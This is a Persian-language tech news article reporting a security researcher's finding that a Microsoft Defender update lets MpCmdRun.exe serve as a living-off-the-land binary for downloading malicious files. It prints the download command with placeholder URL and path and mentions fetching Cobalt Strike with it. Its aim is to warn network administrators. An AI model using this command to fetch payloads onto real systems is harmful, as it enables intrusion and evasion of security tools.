دیجیزا/ ویندوز 10 که با آپدیتهایش کم دردسر برای کاربرانش درست نکرده بود این بار نیز مشکل جدیدی به بار آورده و آن این که آنتی ویروسش بدافزار دانلود میکند! در چنین شرایطی فقط میتوان گفت که گل بود به سبزه نیز آراسته شد!
به گفته یکی از محققان امنیتی بهروزرسانی جدید مایکروسافت دیفندر این نرم افزار را به ابزار دانلود فایلهای مخرب از اینترنت تبدیل کرده است.
یک محقق امنیتی به نام Mohammad Askar میگوید تغییرات در ابزار Command Line مایکروسافت دیفندر به هکرها اجازه میدهد تا از این آنتی ویروس به عنوان LOLBin استفاده کنند. به آن دسته از فایلهای معتبر سیستم عامل که میتوان از آنها برای اهداف خرابکارانه استفاده کرد، LOLBin گفته میشود.
LOLBINها در ویندوز ۱۰ وجود داشته و هر کدام از آنها عملکرد غیرخرابکارانه دارند، اما هکرها با دسترسی غیرمجاز میتوانند از این فایلها برای دور زدن سپرهای امنیتی و حمله به کامپیوتر بدون اطلاع کاربر استفاده کنند.
آنطور که Askar میگوید، ابزار Command Line مایکروسافت دیفندر حالا از دستور جدیدی به نام DownloadFile- پشتیبانی میکند. این تغییر احتمالاً در نسخه 4.18.2007.9 یا 4.18.2009.9 این نرم افزار رخ داده است.
هکرها با نفوذ به شبکه محلی میتوانند با استفاده از ابزار Microsoft Antimalware Service Command Line Utility و دستور زیر فایل مخرب را دانلود کنند:
<MpCmdRun.exe -DownloadFile -url <url> -path <local-path
محقق امنیتی یاد شده با استفاده از این تکنیک بدافزاری به نام Cobalt Strike را مستقیماً بوسیله مایکروسافت دیفندر دانلود کرد.
دیفندر قادر به شناسایی و حذف فایلهای مخرب دانلود شده با استفاده از این روش است، اما مشخص نیست دیگر نرم افزارهای آنتی ویروس نیز قادر به دفاع از سیستم در برابر فایلهای مخرب دانلود شده از این روش هستند یا خیر. به متخصصین شبکه توصیه میشود تا این LOLBin را در لیست خود قرار دهند تا از حمله احتمالی جلوگیری شود.